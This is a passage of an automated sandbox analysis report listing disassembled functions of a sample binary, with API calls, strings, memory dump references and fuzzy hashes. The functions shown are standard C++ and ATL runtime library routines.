                                                                          • Part of subcall function 00AF780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AF780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 2348759532-1402515088
                                                                        • Opcode ID: fd6b7c9eb21440af0ad4f24d82f0cf4de0679328cda46fcba138b7f31683415a
                                                                        • Instruction ID: 7e77e721d2ec55adb045572f37e88b2e77ad258533c03b383976ea6ed3bf1037
                                                                        • Opcode Fuzzy Hash: fd6b7c9eb21440af0ad4f24d82f0cf4de0679328cda46fcba138b7f31683415a
                                                                        • Instruction Fuzzy Hash: 43515C71D00258AFCF05DFE4D988ADDBBB9FF48300F204459E506AB2A5EB349909CF94
                                                                        Function 00B0258E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B02595
                                                                        • _swprintf.LIBCMT ref: 00B0260D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 5c32574dd7da014efdd9f13ea6e467d63325e359b1db238506adcd7cca726138
                                                                        • Instruction ID: a1150e87ad00c4a2ec5e867d3d892f2c5680f5e60e2b29194e18959e84784fdd
                                                                        • Opcode Fuzzy Hash: 5c32574dd7da014efdd9f13ea6e467d63325e359b1db238506adcd7cca726138
                                                                        • Instruction Fuzzy Hash: AC517C71D00248AFCF05DFE4D999ADDBBB9FF48300F208459E946AB295EB359909CF90
                                                                        Function 00B06607 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B0660E
                                                                        • _swprintf.LIBCMT ref: 00B06686
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 0df037f2ba760f063cb6ddcefe583e43824a68eb02b6d1320593a72d71a0a084
                                                                        • Instruction ID: 3509a7caea53da911234b495db4fffe7b4b4f0f577e0c189062597a400692302
                                                                        • Opcode Fuzzy Hash: 0df037f2ba760f063cb6ddcefe583e43824a68eb02b6d1320593a72d71a0a084
                                                                        • Instruction Fuzzy Hash: 42514971D00248AFCF09DFE4D885ADDBBB9FB48300F208599E516AB2A5EB359915CF50
                                                                        Function 00AE9620 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \\?\$\\?\UNC\
                                                                        • API String ID: 0-3019864461
                                                                        • Opcode ID: a17f8c03a03cee336d165c82f1e9631a682f854327bd086f68e91d50599f2177
                                                                        • Instruction ID: fc59d0da238450380a74201048ddce82ce6946e43b5178a3914d6271b2479b35
                                                                        • Opcode Fuzzy Hash: a17f8c03a03cee336d165c82f1e9631a682f854327bd086f68e91d50599f2177
                                                                        • Instruction Fuzzy Hash: A751AF709103449BDB24CF66C995BEFBBF5FF98314F10451EE802A7290DBB5A988CB90
                                                                        Function 00B0B5D1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?), ref: 00B0B5F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: EncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 2118026453-2084237596
                                                                        • Opcode ID: 761f3eb95597e6f3b0359a5fe72bcc6b460015eb2955d58d2baf4aebd8c38776
                                                                        • Instruction ID: 6bd5f1300a8a1926847583541507c54a5f21337a9839011d281e89a0ca07bcd1
                                                                        • Opcode Fuzzy Hash: 761f3eb95597e6f3b0359a5fe72bcc6b460015eb2955d58d2baf4aebd8c38776
                                                                        • Instruction Fuzzy Hash: A0414672900209AFCF15DF98CD81EAEBFF5FF48304F188199F905A62A1D7369A50DB50
                                                                        Function 00B0217C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B02183
                                                                          • Part of subcall function 00AF780A: __EH_prolog3.LIBCMT ref: 00AF7811
                                                                          • Part of subcall function 00AF780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AF780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                        • String ID: %.0Lf$0123456789-
                                                                        • API String ID: 2728201062-3094241602
                                                                        • Opcode ID: 2c1dc4d899479d5b2eea4961dcbbd06ab31c101bf6c33a6495bb8365e54985b7
                                                                        • Instruction ID: 7e0778530cd61af185011a92d65d62de1e9465d9c7bb62c12fbc731c768db6b7
                                                                        • Opcode Fuzzy Hash: 2c1dc4d899479d5b2eea4961dcbbd06ab31c101bf6c33a6495bb8365e54985b7
                                                                        • Instruction Fuzzy Hash: A2413631900218DFCF05EFD8D9849EDBFB5FF09310B10019AF911AB2A1DB309A5ACB95
                                                                        Function 00B064DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B064E2
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: 921f73ab8d4901f7ac7c305021b0ed5e7eae036472960795e811725e97280d0d
                                                                        • Instruction ID: 04b9044d95af065cbd45ee57b26c7a835bfbbddbaf64a53cb85440c608fe1c62
                                                                        • Opcode Fuzzy Hash: 921f73ab8d4901f7ac7c305021b0ed5e7eae036472960795e811725e97280d0d
                                                                        • Instruction Fuzzy Hash: 43416C3190021DEFCF09DFA4D9919EE7FB5EF18310F10409AF421AB2A1DB34AA16CB55
                                                                        Function 00B02460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B02467
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: dc088f92fd7be0be0707c8245152c9ebba4b63628f8bae56ea813e3be8e420fe
                                                                        • Instruction ID: 40fe4dd8f9ce0ce083054d68d772c54b2e37ec7a263243c474acf3dec7b92831
                                                                        • Opcode Fuzzy Hash: dc088f92fd7be0be0707c8245152c9ebba4b63628f8bae56ea813e3be8e420fe
                                                                        • Instruction Fuzzy Hash: 17415831900258DFCF05DFA8D9959EDBFB5FF08310F1000A9F915AB2A1DB309A5ACB64
                                                                        Function 00B067B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: d3571c8c23943aad0dd4fe49d3275653fadddc2db7ce0cdceb924f094a89006d
                                                                        • Instruction ID: d45cfe727ae6fd1c611dd6711a57daa7caac2bf0fc5f798166e283836efb7d87
                                                                        • Opcode Fuzzy Hash: d3571c8c23943aad0dd4fe49d3275653fadddc2db7ce0cdceb924f094a89006d
                                                                        • Instruction Fuzzy Hash: 41411870A10249EFDF05DFA8D881AEEBBF1BF08300F04846AF955A7292D7309A15CB60
                                                                        Function 00B02DB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: bcd4a4b2c600fe3161c55dd08ea46bf838ed41e4fb11b6f1693d3bae2f11a996
                                                                        • Instruction ID: c9d187cc46a78307c6ed2d9cf9967bece0f17e9feb43662cb46af59bbcd31dcc
                                                                        • Opcode Fuzzy Hash: bcd4a4b2c600fe3161c55dd08ea46bf838ed41e4fb11b6f1693d3bae2f11a996
                                                                        • Instruction Fuzzy Hash: 2C313B75A01209EBDF04DFA4D9859EEBBF2FF48304F204469F905AB251E7359E15CB50
                                                                        Function 00AED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: 4270a719f4994e3363ee459dc16cf3c7e51991d7dffdca5c410c573d4da98eed
                                                                        • Instruction ID: 081a6c305cbf187643f24d680477933a4fff1f9422e57c20ad9292f84d172eb4
                                                                        • Opcode Fuzzy Hash: 4270a719f4994e3363ee459dc16cf3c7e51991d7dffdca5c410c573d4da98eed
                                                                        • Instruction Fuzzy Hash: 6021D3711083849FD711CF19C859B9BBBE9AF89304F04895DF99887292D634D918C7A3
                                                                        Function 00AED6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: e9cbbfad91bd3961ae967f72aa28137c8c1961ec0dc88d240fe87ae43ceab19c
                                                                        • Instruction ID: a48fce4764f0ce38e68e9d762a06130d17d192fbbae10a0585a0026fa4cd76f0
                                                                        • Opcode Fuzzy Hash: e9cbbfad91bd3961ae967f72aa28137c8c1961ec0dc88d240fe87ae43ceab19c
                                                                        • Instruction Fuzzy Hash: 8821D3762083859FE711CF19C845B9BBBE9EBC9300F14881DF99487292C734D918CBA7
                                                                        Function 00AED7B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: e1318e7f67a0e2061c12e2379b86369c763334f931844ff509ae279dd58f304f
                                                                        • Instruction ID: 221b72f08a373f64df5435de97d1589fc29c3f56f380cd534d40cdbd876e5ee4
                                                                        • Opcode Fuzzy Hash: e1318e7f67a0e2061c12e2379b86369c763334f931844ff509ae279dd58f304f
                                                                        • Instruction Fuzzy Hash: D721B0712083859FE711CF29C845B9BBBEAEBD9300F14881DF99487292C734D918CBA3
                                                                        Function 00AE80D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00AE8116
                                                                        • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,1816BA6E), ref: 00AE8185
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertFreeLocalString
                                                                        • String ID: Invalid SID
                                                                        • API String ID: 3201929900-130637731
                                                                        • Opcode ID: df686111f71d6dd023cef98f7a5a4c25b76c361a0e97387e3a872f1653eb3cde
                                                                        • Instruction ID: 90a0c893e026e2dd3c23d75c3ff348a27ad749fc270fe5eb8bc2677ef889cb87
                                                                        • Opcode Fuzzy Hash: df686111f71d6dd023cef98f7a5a4c25b76c361a0e97387e3a872f1653eb3cde
                                                                        • Instruction Fuzzy Hash: 7921AE75A003459BDB10CF59C819BAFFBF8FF44B04F10464EE905A7280DBB96A458BD0
                                                                        Function 00AEC140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEC16B
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEC1CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3988782225-1405518554
                                                                        • Opcode ID: b796df69df8f488564213e1336a7ef63d77b633ac599aed4185e93ddfb560d90
                                                                        • Instruction ID: 25aa72508c809f5493451065fb08f7c04179a396d32802c2329c234c3af9f679
                                                                        • Opcode Fuzzy Hash: b796df69df8f488564213e1336a7ef63d77b633ac599aed4185e93ddfb560d90
                                                                        • Instruction Fuzzy Hash: 2D21FD70809B88EED721CFA8C90474BBFF4EF15710F14869EE08997781D7B5AA04CBA1
                                                                        Function 00AF4077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 2427045233-2658103896
                                                                        • Opcode ID: 5e494e3154a22e947b2c1e84bb02f3d8142b440de579cc2d33a7f01e3181f0d5
                                                                        • Instruction ID: b9eae0fc620a1b36e71054fd1d5a7d20b04d11cdca4831a49cda33d8d816d5e9
                                                                        • Opcode Fuzzy Hash: 5e494e3154a22e947b2c1e84bb02f3d8142b440de579cc2d33a7f01e3181f0d5
                                                                        • Instruction Fuzzy Hash: E5110471D40749AEC724EFB4D852B9BBBF4EF09300F00856AF2A58B251EB30E504CB90
                                                                        Function 00AF1E15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00AF0B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,1816BA6E,?,00B293B0,000000FF), ref: 00AF0B27
                                                                          • Part of subcall function 00AF0B00: GetLastError.KERNEL32(?,00000000,00000000,1816BA6E,?,00B293B0,000000FF), ref: 00AF0B31
                                                                        • IsDebuggerPresent.KERNEL32(?,?,00B3FAD8), ref: 00AF1E48
                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B3FAD8), ref: 00AF1E57
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AF1E52
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 3511171328-631824599
                                                                        • Opcode ID: 01e975ac5f248ade002a1b4312551b4b8660e463ee2c6fddfbfe61f3c0660bd8
                                                                        • Instruction ID: 6e3530e77b5d420eaa96bea835ff75bbbc33f8acb17e66c5fb3477cb63ebc34a
